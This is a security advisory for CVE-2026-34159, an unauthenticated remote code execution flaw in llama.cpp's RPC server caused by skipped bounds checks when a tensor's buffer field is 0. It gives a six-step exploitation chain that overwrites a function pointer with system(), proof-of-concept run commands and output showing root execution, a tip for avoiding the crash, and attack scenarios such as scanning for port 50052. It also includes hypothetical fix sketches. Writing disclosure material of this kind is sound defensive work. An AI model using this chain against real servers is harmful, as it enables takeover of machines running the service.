
Unauthenticated RCE via GRAPH_COMPUTE buffer=0 bypass in llama.cpp RPC backend

Critical
ggerganov published GHSA-j8rj-fmpv-wcxw Mar 26, 2026

Software

llama.cpp

Affected versions

<= b7991

Patched versions

None

Description

Summary

The RPC backend's deserialize_tensor() skips all bounds validation when a tensor's buffer field is 0. An unauthenticated attacker can read and write arbitrary process memory via crafted GRAPH_COMPUTE messages. Combined with pointer leaks from ALLOC_BUFFER/BUFFER_GET_BASE, this gives a full ASLR bypass and remote code execution. No authentication is required; TCP access to the RPC server port is sufficient.

Details

In ggml/src/ggml-rpc/ggml-rpc.cpp, deserialize_tensor() (called during GRAPH_COMPUTE) only validates the data pointer when buffer != nullptr:

// Line 1177-1180: buffer=0 -> nullptr, validation skipped
result->buffer = reinterpret_cast<ggml_backend_buffer_t>(tensor->buffer);
if (result->buffer && buffers.find(result->buffer) == buffers.end()) {
    result->buffer = nullptr;
}

// Line 1182-1189: bounds check ONLY runs when buffer != nullptr
if (result->buffer) {
    // ... GGML_ASSERT checks on data pointer ...
}

// Line 1196: data pointer set unconditionally from attacker input
result->data = reinterpret_cast<void *>(tensor->data);

When buffer=0, the attacker-controlled data pointer is passed directly to the ggml compute kernels (e.g., ggml_compute_forward_dup calls memcpy on tensor->data), which gives the attacker arbitrary read and write access to process memory.

The SET_TENSOR bounds check (the RPC-04 fix) does not protect this path. GRAPH_COMPUTE uses graph_compute() -> create_node() -> deserialize_tensor(), a completely separate code path.
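A minimal sketch of one possible fix follows, assuming the server keeps a registry of the buffers it allocated together with their base address and size. The names BufferInfo and validate_tensor_data are hypothetical and are not the llama.cpp API. The point is that the range check runs on every path instead of only when buffer != nullptr. The excerpt above also maps an unknown non-zero handle to nullptr, which skips validation in the same way, so the sketch rejects unknown handles outright. Treating buffer=0 with a non-null data pointer as invalid is an assumption about what the protocol should allow.

```cpp
#include <cassert>
#include <cstdint>
#include <map>

// Hypothetical registry entry: base address and size of a server-allocated buffer.
struct BufferInfo {
    uint64_t base;
    uint64_t size;
};

// Returns true only if [data, data + nbytes) lies inside a registered buffer.
// Assumption: a tensor with buffer == 0 must also have data == 0.
bool validate_tensor_data(const std::map<uint64_t, BufferInfo> & buffers,
                          uint64_t buffer, uint64_t data, uint64_t nbytes) {
    if (buffer == 0) {
        // No backing buffer: refuse any non-null data pointer instead of skipping checks.
        return data == 0;
    }
    auto it = buffers.find(buffer);
    if (it == buffers.end()) {
        // Unknown handle: reject rather than silently downgrading to buffer = nullptr.
        return false;
    }
    const BufferInfo & b = it->second;
    if (data + nbytes < data) {
        return false; // data + nbytes wrapped around 2^64
    }
    return data >= b.base && data + nbytes <= b.base + b.size;
}
```

Placing a check like this inside deserialize_tensor() itself, rather than in individual command handlers, would cover every caller, including the GRAPH_COMPUTE path that the 2024 handler-level patches missed.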

Exploitation chain:

  1. ASLR bypass: ALLOC_BUFFER returns a raw heap pointer, and BUFFER_GET_BASE returns the data-area pointer. Raw addresses are used as handles, with no indirection table.
  2. Arbitrary read: GRAPH_COMPUTE with buffer=0 tensors + OP_CPY copies from any address into a readable buffer.
  3. Code pointer leak: Read the buffer struct's iface function pointers to recover the libggml-base.so base address.
  4. libc resolution: Read free@GOT.PLT from libggml-base.so, compute system() address via offset arithmetic.
  5. Function pointer overwrite: Overwrite a victim buffer struct's iface.clear with system(), place command string at offset 0 of the struct.
  6. Trigger: BUFFER_CLEAR calls buffer->iface.clear(buffer, 0) which becomes system("attacker_command").
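Step 1 works because the server hands raw heap addresses to clients as handles. As a hedged illustration of the missing indirection table, the hypothetical HandleTable below gives clients only small opaque IDs and resolves them on the server, so a handle reveals nothing about the address-space layout and an unregistered ID resolves to nullptr. This is a sketch, not the llama.cpp implementation, and it covers only handle values: BUFFER_GET_BASE would still expose the data-area address unless tensor data were also expressed as offsets into a buffer, which is an assumption about a possible protocol change.

```cpp
#include <cassert>
#include <cstdint>
#include <unordered_map>

// Hypothetical opaque-handle table: clients only ever see integer IDs,
// never heap addresses, so a handle leaks nothing about memory layout.
template <typename T>
class HandleTable {
public:
    // Registers a server-side pointer and returns a fresh ID (never 0).
    uint64_t insert(T * ptr) {
        uint64_t id = next_id_++;
        table_[id] = ptr;
        return id;
    }

    // Resolves an ID received from the wire; nullptr for unknown or freed IDs.
    T * lookup(uint64_t id) const {
        auto it = table_.find(id);
        return it == table_.end() ? nullptr : it->second;
    }

    // Drops an ID when the underlying object is freed; false if it was unknown.
    bool erase(uint64_t id) { return table_.erase(id) > 0; }

private:
    uint64_t next_id_ = 1; // 0 stays reserved for "no buffer"
    std::unordered_map<uint64_t, T *> table_;
};
```

Sequential IDs keep the sketch simple; they reveal allocation order but not addresses, which is the property step 1 depends on.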

PoC

Tested 2026-02-07 against rpc-server in Docker (Ubuntu 24.04, aarch64, commit e0c93af2a03f5c53d052dfaefd86c06ed3784646).

# Build (pinned commit for reproducible offsets)
cd exploits/
docker build -t rpc-debug -f Dockerfile.rpc-pinned .
docker run -d --name rpc-debug -p 50052:50052 rpc-debug

# Extract offsets (needed if rebuilding with different commit/distro)
docker exec rpc-debug /extract_offsets.sh

# Run full RCE chain
python3 rpc_graph_compute_poc.py 127.0.0.1 50052

# Verify
docker exec rpc-debug cat /tmp/pwned
# uid=0(root) gid=0(root) groups=0(root)

PoC output:

Phase 1 - Pointer Leak:
  Buffer A struct: 0x0000aaab1ddc4f70
  Buffer A data:   0x0000aaab1ddc7800

Phase 2 - Arbitrary Copy (buffer=0):
  Buffer B after: b'EXPLOITED_BY_BUFFER_ZERO_BYPASS!'
  [!!!] MATCH - buffer=0 arbitrary copy CONFIRMED

Phase 3 - Function Pointer Leak:
  clear = 0x0000ffffaac0ece4 (libggml-base.so)

Phase 4 - Resolve system():
  system() = 0x0000ffff9f4bcec4

Phase 5 - RCE:
  [!!!] Server responded - command executed successfully!

The server crashes (SIGBUS, exit 135) shortly after command execution during cleanup of the corrupted buffer struct. The command runs successfully and the BUFFER_CLEAR response is sent back before the crash. An attacker could avoid the crash by restoring the original iface struct via a second GRAPH_COMPUTE copy before triggering.

Impact

Remote code execution. Any unauthenticated TCP client that can reach the RPC server port (default 50052) gets arbitrary command execution as the server process user (often root in Docker).

  • Defeats ASLR via protocol-level pointer leaks
  • Defeats NX via function pointer hijacking (no shellcode needed)
  • Stack canaries and RELRO are irrelevant since this is a heap struct overwrite

Attack scenarios:

  • Lateral movement in corporate/cloud networks: scan for port 50052 on GPU servers
  • Internet exposure via Docker -p 50052:50052 or --host 0.0.0.0
  • Local privilege escalation from any process on the same host

The RPC backend must be explicitly enabled (-DGGML_RPC=ON) and defaults to localhost, but the intended use case is distributed inference across machines, so network exposure is expected.

Relation to prior CVEs

This vulnerability shares the same root cause as two previously patched CVEs:

  • CVE-2024-42478 (GHSA-xcr4-8r59-4fh2): OOB read via GET_TENSOR - patched by adding bounds validation in the GET_TENSOR handler.
  • CVE-2024-42479 (GHSA-g84r-q9f6-3frf): OOB write via SET_TENSOR - patched by adding a bounds check (marked with the comment // sanitize tensor->data) in set_tensor() (lines 1227-1237).

All three share the same underlying bug: deserialize_tensor() does not validate tensor->data when buffer=0. The 2024 patches added bounds checks in the GET_TENSOR and SET_TENSOR command handlers, but the GRAPH_COMPUTE command takes a separate code path (graph_compute() -> create_node() -> deserialize_tensor()) that was never patched. The buffer=0 bypass has been present since the initial RPC implementation (PR #6829, merged 2024-05-14).

This variant is more severe than the prior two because GRAPH_COMPUTE processes multiple tensors with arbitrary operations, giving the attacker both read and write primitives in a single request. The prior CVEs only gave read (GET_TENSOR) or write (SET_TENSOR) individually.

Disclosure context

This was reported to CERT/CC on 2026-02-08 as VU#748698. CERT/CC closed the case, so this report is being filed directly with the maintainers.

The project's SECURITY.md explicitly excludes RPC from vulnerability scope, stating: "Do not use the RPC backend" and "none of the topics under 'Using llama.cpp securely' are considered vulnerabilities." However, a full-chain unauthenticated RCE with a working exploit against a network service that ships in the official build system warrants maintainer awareness regardless of scope policy. The RPC backend is used in production for distributed inference across machines.

Severity

Critical

CVSS overall score

9.8 / 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
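The 9.8 overall score follows from the CVSS v3.1 base-score formula applied to this vector. The sketch below implements that formula for the Scope:Unchanged case only, including the specification's integer-based Roundup; the function names are illustrative.

```cpp
#include <algorithm>
#include <cassert>
#include <cmath>

// CVSS v3.1 Roundup: smallest one-decimal value >= x, computed on integers
// to avoid floating-point artifacts, as described in the v3.1 specification.
double roundup(double x) {
    long long int_input = std::llround(x * 100000.0);
    if (int_input % 10000 == 0) {
        return int_input / 100000.0;
    }
    return (std::floor(int_input / 10000.0) + 1.0) / 10.0;
}

// Base score for a Scope:Unchanged vector; arguments are the metric weights.
double base_score_scope_unchanged(double av, double ac, double pr, double ui,
                                  double c, double i, double a) {
    double iss = 1.0 - (1.0 - c) * (1.0 - i) * (1.0 - a); // impact sub-score
    double impact = 6.42 * iss;
    double exploitability = 8.22 * av * ac * pr * ui;
    if (impact <= 0.0) {
        return 0.0;
    }
    return roundup(std::min(impact + exploitability, 10.0));
}
```

For this vector the weights are AV:N = 0.85, AC:L = 0.77, PR:N = 0.85, UI:N = 0.85 and C/I/A:H = 0.56 each, giving ISS = 0.914816, Impact ≈ 5.873 and Exploitability ≈ 3.887; their sum of about 9.76 rounds up to 9.8.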

CVE ID

CVE-2026-34159

Weaknesses

Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119)

The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Credits